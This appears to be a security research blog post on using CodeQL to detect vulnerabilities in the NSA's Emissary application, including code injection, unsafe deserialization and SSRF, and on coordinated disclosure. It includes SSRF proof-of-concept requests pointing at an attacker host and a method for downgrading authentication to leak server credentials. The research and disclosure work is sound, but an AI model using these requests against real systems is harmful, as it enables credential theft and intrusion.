Some time ago, I read a blog post about the review that SonarSource security researchers performed of the Emissary application, which is maintained by the National Security Agency (NSA). According to the NSA, Emissary is a “P2P based data-driven workflow engine that runs in a heterogeneous possibly widely dispersed, multi-tiered P2P network of compute resources.” I read that as “this Java code probably handles a lot of attacker controlled input,” so naturally my interest was piqued.
The SonarSource blog post describes some of the vulnerabilities that researchers uncovered in Emissary, including:
- Code injection (CVE-2021-32096)
- Arbitrary file disclosure (CVE-2021-32093)
- Reflected cross-site scripting (CVE-2021-32092)
Having worked on a CodeQL query to detect similar code injection patterns, I wanted to check if the query could find these issues automatically. In this blog post, I describe how CodeQL detects some of the above-mentioned CVEs using its default rule set, how we were able to find an entirely new set of additional critical issues, and how the NSA leveraged GitHub code scanning and security advisories to ultimately address the issues.
CodeQL findings
Here’s a quick summary of my CodeQL findings, all of which I cover in detail below.
By running the standard set of CodeQL queries on the Emissary project, I found the previously reported arbitrary file disclosure (CVE-2021-32093) but also uncovered new issues:
- Unsafe deserialization (CVE-2021-32634)
- Server-side request forgery (CVE-2021-32639)
The original code injection CVE (CVE-2021-32096) was flagged by a community-contributed CodeQL query.
As of today, the reflected cross-site scripting vulnerability (CVE-2021-32092) is also found by a default CodeQL query.
Code injection (CVE-2021-32096)
Initially, when I tried the CodeQL script injection query on the Emissary 5.9.0 codebase I got no results.
After reading the source code for the vulnerability details, I was sure that my query was correctly modeling the javax.script.ScriptEngine.eval()
sink and the source was already modelled by the default CodeQL JAX-RS libraries. However, I realized that the flow from the untrusted data to the script injection sink was not a “direct” one. You can take a look at how the code flows to understand why.
The JAX-RS endpoint where user data enters the application is:
The getOrCreateConsole(request)
will call RubyConsole.getConsole()
which takes us to:
This code starts a new thread running the RubyConsole.run()
method (since it implements the Java Runnable interface):
However, since at this point, stringToEval
is null, this method will almost immediately suspend the thread with the wait()
method.
Later on, in the rubyConsolePost
, we find the following code:
Here is where the untrusted data (request.getParameter(CONSOLE_COMMAND_STRING)
) enters the application and flows into the RubyConsole.evalAndWait()
method. However, the evalAndWait()
method is:
There are no actual calls to the RubyConsole.eval()
method where the Ruby script is evaluated, so if you trace the tainted request parameter, you will end up in this method and reach the end of your taint trace. The user controlled command just gets assigned to the stringToEval
field, and that’s seemingly the end of the road. However, if you take a closer look, you will also see that this method is calling the notifyAll()
method, which means that this method will effectively wake up the sleeping thread which will in turn run the following expression:
result = this.eval(stringToEval);`
To summarize:
- When the
rubyConsolePost
method is called,RubyConsole.run()
is executed with a nullstringToEval
and then goes into a wait state. - When
evalAndWait(commandString)
is called, thestringToEval
gets the user-controlled script and then resumes theRubyConsole.run()
method, which will evaluate the now-assignedstringToEval
Therefore, there is no direct (source to sink) data flow that a static code analysis tool can effectively follow. The good news is that by modelling the Java wait
/notify
pattern with a CodeQL taint step, I should be able to get this issue reported.
In this code pattern, you can see two different types of blocks: synchronized blocks that call notify
and synchronized blocks that call wait
. When the synchronization occurs on the same object, I want to connect writes in the notify
block with reads of the same fields on the wait
block. That means I need an additional taint step to connect these otherwise disconnected nodes so that CodeQL’s taint tracking can bridge this logical disconnect:
class NotifyWaitTaintStep extends TaintTracking::AdditionalTaintStep {
override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
exists(MethodAccess notify, MethodAccess wait, SynchronizedStmt notifySync, SynchronizedStmt waitSync |
notify.getMethod().hasQualifiedName("java.lang", "Object", ["notify", "notifyAll"]) and
notify.getAnEnclosingStmt() = notifySync and
wait.getMethod().hasQualifiedName("java.lang", "Object", "wait") and
wait.getAnEnclosingStmt() = waitSync and
waitSync.getExpr().getType() = notifySync.getExpr().getType() and
exists(AssignExpr write, FieldAccess read |
write.getAnEnclosingStmt() = notifySync and
write = n1.asExpr() and
read.getAnEnclosingStmt() = waitSync and
read.getField() = write.getDest().(FieldAccess).getField() and
read = n2.asExpr()
)
)
}
}
With this additional taint step enabled, I was able to get this issue successfully reported:
What’s awesome is that this query wasn’t developed by GitHub CodeQL engineers but contributed and improved by several CodeQL community members. A big shoutout to @SpaceWhite, @p0wn4j, and @lucha-bc:
- https://github.com/github/codeql/pull/2850
- https://github.com/github/codeql/pull/5349
- https://github.com/github/codeql/pull/5802
This community-contributed query is on its way to the standard query set and will soon be available to all open source projects running GitHub code scanning.
I also contributed my notify/wait pattern taint step to the CodeQL repository, which may soon enable similar dataflow analysis between synchronized fields for all CodeQL users!
Arbitrary file disclosure (CVE-2021-32093)
CodeQL found the arbitrary file disclosure with the default configuration, and therefore I won’t comment on the details of this vulnerability since it was already described in the SonarSource blog post.
Unsafe deserialization (CVE-2021-32634)
CodeQL default queries also reported three unsafe deserialization operations.
The first one was located in the WorkSpaceClientEnqueueAction
REST endpoint:
@POST
@Path("/WorkSpaceClientEnqueue.action")
@Consumes(MediaType.APPLICATION_FORM_URLENCODED)
@Produces(MediaType.TEXT_PLAIN)
public Response workspaceClientEnqueue(@FormParam(WorkSpaceAdapter.CLIENT_NAME) String clientName,
@FormParam(WorkSpaceAdapter.WORK_BUNDLE_OBJ) String workBundleString) {
logger.debug("TPWorker incoming execute! check prio={}", Thread.currentThread().getPriority());
// TODO Doesn't look like anything is actually calling this, should we remove this?
final boolean success;
try {
// Look up the place reference
final String nsName = KeyManipulator.getServiceLocation(clientName);
final IPickUpSpace place = (IPickUpSpace) Namespace.lookup(nsName);
if (place == null) {
throw new IllegalArgumentException("No client place found using name " + clientName);
}
final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(workBundleString.getBytes("8859_1")));
WorkBundle paths = (WorkBundle) ois.readObject();
success = place.enque(paths);
}
...
}
This endpoint can be reached via an authenticated POST request to /WorkSpaceClientEnqueue.action
. As you can read in the source code, the form parameter WorkSpaceAdapterWORK_BUNDLE_OBJ
(tpObj
) gets decoded and deserialized in line 52.
final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(workBundleString.getBytes("8859_1")));
Fortunately, this is a post-authentication issue, and since the SonarSource report got the cross-site request forgery (CSRF) vulnerability fixed, this vulnerability could not be exploited on behalf of a logged-in user through CSRF.
CodeQL also reported two other unsafe deserialization operations which are not currently exercised in the code. However, they are ticking bombs which could be enabled in future releases and therefore the Security Lab team also reported them.
The first one originates from the MoveToAction
class which was not exposed by the Jersey server. As described in a comment “// TODO This is an initial crack at the new endpoint, I haven’t seen it called an am unsure when/if it does”
MoveToAction:
public Response moveTo(@Context HttpServletRequest request)
final MoveToAdapter mt = new MoveToAdapter();
final boolean status = mt.inboundMoveTo(request);
...
MoveToAdapter:
public boolean inboundMoveTo(final HttpServletRequest req)
final MoveToRequestBean bean = new MoveToRequestBean(req);
MoveToRequestBean(final HttpServletRequest req)
final String agentData = RequestUtil.getParameter(req, AGENT_SERIAL);
setPayload(agentData);
this.payload = PayloadUtil.deserialize(s);
...
PayloadUtil:
ois = new ObjectInputStream(new ByteArrayInputStream(s.getBytes("8859_1")));
The second one originates from the inboundEnque
method of the WorkSpaceAdapter
class. The vulnerability requires a call to inboundEnque()
which is currently not exercised.
WorkspaceAdapter:
/**
* Process the enque coming remotely over HTTP request params onto the specified (local) pickup client place
*/
public boolean inboundEnque(final HttpServletRequest req) throws NamespaceException {
logger.debug("TPA incoming elements! check prio={}", Thread.currentThread().getPriority());
// Parse parameters
final EnqueRequestBean bean = new EnqueRequestBean(req);
// Look up the place reference
final String nsName = KeyManipulator.getServiceLocation(bean.getPlace());
final IPickUpSpace place = lookupPlace(nsName);
if (place == null) {
throw new IllegalArgumentException("No client place found using name " + bean.getPlace());
}
return place.enque(bean.getPaths());
}
WorkspaceAdapter:
EnqueRequestBean(final HttpServletRequest req) {
setPlace(RequestUtil.getParameter(req, CLIENT_NAME));
if (getPlace() == null) {
throw new IllegalArgumentException("No 'place' specified");
}
setPaths(RequestUtil.getParameter(req, WORK_BUNDLE_OBJ));
}
WorkspaceAdapter:
/**
* Sets the WorkBundle object from serialized data
*/
void setPaths(final String s) {
try {
final ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(s.getBytes("8859_1")));
this.paths = (WorkBundle) ois.readObject();
} catch (Exception e) {
logger.error("Cannot deserialize WorkBundle using {} bytes", s.length(), e);
throw new IllegalArgumentException("Cannot deserialize WorkBundle");
}
}
Server-Side request forgery (CVE-2021-32639)
Finding this issue with CodeQL resulted from another great example of a community contribution. The query that reported this issue was originally contributed by @lucha-bc and @porcupineyhairs, and was already promoted into the default set of rules used in any CodeQL scan.
The query reports two server-side request forgery (SSRF) issues. The first one affects the RegisterPeerAction
REST endpoint. For example, the following request will cause multiple requests to be sent to an attacker-controlled server at http://attacker:9999
.
POST /emissary/RegisterPeer.action? HTTP/1.1
Host: localhost:8001
Content-Type: application/x-www-form-urlencoded
directoryName=foo.bar.baz.http://attacker:9999/&targetDir=http://localhost:8001/DirectoryPlace
An important thing to note is that some of the forged requests were non-authenticated requests sent to the /emissary/Heartbeat.action
endpoint:
POST /emissary/Heartbeat.action HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: attacker:9999
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.1 (Java/1.8.0_242)
Accept-Encoding: gzip,deflate
hbf=EMISSARY_DIRECTORY_SERVICES.DIRECTORY.STUDY.http%3A%2F%2Flocalhost%3A8001%2FDirectoryPlace&hbt=http%3A%2F%2Fattacker:9999%2FDirectoryPlace
However, there were also authenticated requests sent to the /emissary/RegisterPeer.action
endpoint on the attacker-controlled server:
POST /emissary/RegisterPeer.action HTTP/1.1
Content-Length: 196
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: attacker:9999
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.1 (Java/1.8.0_242)
Accept-Encoding: gzip,deflate
targetDir=http%3A%2F%2Fattacker:9999%2FDirectoryPlace&directoryName=EMISSARY_DIRECTORY_SERVICES.DIRECTORY.STUDY.http%3A%2F%2Flocalhost%3A8001%2FDirectoryPlace
SSRF issues are normally used to reach internal servers or to scan the internal network, but in this case I thought of a different exploitation scenario. Since one of the SSRF issues resulted in the Apache HTTP client used by Emissary sending an authenticated request with a digest authentication header, I theorized I could potentially coax the client to switch to basic authentication and as a result leak the server credentials.
To send authenticated requests using the Apache HTTP client, one needs to set the credentials on a credentials provider and then configure the HTTP client to use that credentials provider:
You can see that the credentials are read from the Jetty user realm and used to connect to any host and any port that requires credentials. Those credentials are set in a credential provider (CRED_PROV
) which is later configured as the default credentials provider for the main Emissary client (CLIENT
).
The configuration does not specify what authentication scheme should be used, which led me to believe that the authentication scheme is decided based on the server response. If I politely ask the client to use basic authentication, then all signs point to the possibility that the server credentials will then be sent in the clear (base64 encoded).
I set up a web server requesting basic authentication and then used the SSRF issue to make the Emissary server connect to my malicious server. The Emissary HTTP client happily switched from digest authentication to basic authenticastion and sent the credentials to me. This was output of my server showing the server credentials:
Similarly, the AddChildDirectoryAction
endpoint was also vulnerable to SSRF. A POST request to the /AddChildDirectory.action
endpoint will trigger additional requests to hosts controlled by the attacker:
POST /emissary/AddChildDirectory.action HTTP/1.1
Host: localhost:8001
x-requested-by:
Content-Type: application/x-www-form-urlencoded
directoryName=foo.bar.baz.http://attacker:9999/&targetDir=http://localhost:8001/DirectoryPlace
In addition to fixing the SSRF issues, the NSA also prevented the authentication method confusion by only allowing the digest authentication scheme.
Reflected cross-site scripting (CVE-2021-32092)
CodeQL did a great job automatically finding most of the issues reported by the SonarSource researchers as well as several new critical issues, however it did not report the cross-site scripting (XSS) issue originally reported by SonarSource researchers. I checked our query set and found that there were no queries for this particular instance of XSS.
I then set out to collaborate with the CodeQL team to include a rather comprehensive analysis of XSS issues on JAX-RS endpoints. This XSS detection is now included in the main CodeQL repository as well!
Accurately detecting XSS on REST endpoints is not a simple task since most of them will default to the application/json
response content-type, which is safe from XSS. Therefore, I needed CodeQL to detect not only that user controlled data (either reflected or persisted) is used in the HTTP response without proper encoding, but also that the content-type of such a response was changed to any of the XSS friendly types. This can be accomplished in a number of ways:
- By explicitly setting the response content-type with
ResponseBuilder.type()
- By annotating enclosing method with the
@Produces
annotation - By annotating enclosing class with the
@Produces
annotation
If you’re interested in the CodeQL implementation details, you can check the promotion pull request.
While working on these query improvements with the CodeQL team, I realized that our XSS query for Spring REST endpoints was not accounting for the response content-type neither, which could result in a number of false positives (for example, responses with the application/json
content-type being flagged as exploitable). So we also implemented the required improvements to bring the Spring XSS query to the same level of accuracy that JAX-RS now has.
GitHub Security Advisories and code scanning
For an open source maintainer (yep, even the NSA), the process of receiving vulnerability reports and then collaborating with vulnerability reporters to triage an issue, getting a CVE assigned, and publishing and hosting a vulnerability advisory to notify downstream users can be a daunting task. To make this process more manageable for open source maintainers, GitHub created the GitHub Security Advisory (GHSA). An open source maintainer can create a private draft security advisory and use this draft advisory to communicate with vulnerability reporters in private. It also enables the creation of a private fork where maintainers and researchers can privately collaborate on vulnerability triage. Once a patch is available, requesting a CVE and publishing the advisory is just a matter of a few clicks.
After I reported the newly uncovered issues to the Emissary maintainers, they created their first GHSA!
“We ended up using the GitHub mechanisms to create a fork/branch [in order to] capture and review the changes[. We] ultimately merged the fix from there and sent the request to obtain a CVE. All very straightforward.”
A member of the Emissary Development Team
Furthermore, after verifying the accuracy of the CodeQL queries, its development team also enabled code scanning to enable automatic CodeQL scans on new pull requests. Code scanning is free to use for open source projects and provides all the power of CodeQL standard query sets to your projects.
Conclusions
The GitHub Security Lab’s mission is to help secure open source software by reporting vulnerabilities and empowering others to find and fix variants of those vulnerabilities. To help achieve this mission, we want to share the tooling and methodologies that we use with the security research and developer communities and make our processes easy to adopt and use. CodeQL is a powerful static application security testing (SAST) engine, but what makes it even more powerful is that it’s fueled by community contributions. By turning your vulnerability findings into CodeQL queries, you amplify your research at GitHub scale through the CodeQL code scanning ecosystem. Head to the Security Lab bug bounty program to propose your contributions!
GitHub Security Advisories are also helping OSS maintainers more effectively navigate the vulnerability reporting process and reduce the resources diverted away from feature development. Learn how to use GitHub Security Advisories to privately discuss, fix, and publish information about security vulnerabilities in your project. Stay secure!